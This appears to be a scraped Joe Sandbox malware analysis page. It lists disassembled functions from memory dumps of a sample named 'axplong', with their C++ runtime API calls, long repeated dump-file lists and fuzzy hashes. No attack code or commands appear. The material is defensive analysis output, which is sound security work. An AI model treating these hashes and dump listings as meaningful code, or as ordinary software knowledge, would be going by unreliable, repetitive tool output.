                                                                                                                                                                                                                                                    Function 00686C70 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00686D41
                                                                                                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 00686D92
                                                                                                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 00686DA2
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00686E45
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00686F4B
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00686F86
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1997747980-0
                                                                                                                                                                                                                                                    • Opcode ID: 4730e7f5dc0736d0752835b33f7ad08ae61e9eb357ca20cdeacb536050d27808
                                                                                                                                                                                                                                                    • Instruction ID: 6215a3d5e56dddbd1c1f2098db9b7246e906cfe88ada312a5baf693328dbc485
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4730e7f5dc0736d0752835b33f7ad08ae61e9eb357ca20cdeacb536050d27808
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AC1E1B09043089FDB21EF64D949BAABBF6AF05310F00466DF51697792EB31E908CB61
                                                                                                                                                                                                                                                    Function 0069440E Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 00694468
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069449C
                                                                                                                                                                                                                                                    • Hash.LIBCMT ref: 00694505
                                                                                                                                                                                                                                                    • Hash.LIBCMT ref: 00694515
                                                                                                                                                                                                                                                      • Part of subcall function 00699B71: std::bad_exception::bad_exception.LIBCMT ref: 00699B93
                                                                                                                                                                                                                                                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0069467B
                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006946D4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3010677857-0
                                                                                                                                                                                                                                                    • Opcode ID: 3049801b331e4a066fe2b350c713fd6b3bfc9ecd1f84d09a2e5de023ebf60beb
                                                                                                                                                                                                                                                    • Instruction ID: 7b0f7e1a57776301b1249e11d35a467b3f738fae1725267bfbb577066fac94a0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3049801b331e4a066fe2b350c713fd6b3bfc9ecd1f84d09a2e5de023ebf60beb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D58182B0A11A12BBDB44EF748845BD9FBADBF09710F10431EF42897681CB74A664CBD4
                                                                                                                                                                                                                                                    Function 0068ED8F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 0068EDEC
                                                                                                                                                                                                                                                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0068EDF8
                                                                                                                                                                                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0068EE11
                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0068EE3F
                                                                                                                                                                                                                                                    • Concurrency::Context::Block.LIBCONCRT ref: 0068EE61
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1182035702-0
                                                                                                                                                                                                                                                    • Opcode ID: d4ce4034643482ac357e6bc71ae78fe57170d53e2c15fbbec47d269a73e325de
                                                                                                                                                                                                                                                    • Instruction ID: f7408a36d7e70c8935e1364e078746ec08cde37bbdfb08eb01ba3c13fb2c497f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4ce4034643482ac357e6bc71ae78fe57170d53e2c15fbbec47d269a73e325de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C218370D0020ACADF64FFA4C4496EEB7F2BF15310F20072DE261A62D0EBB29A44CB55
                                                                                                                                                                                                                                                    Function 006AC9B0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
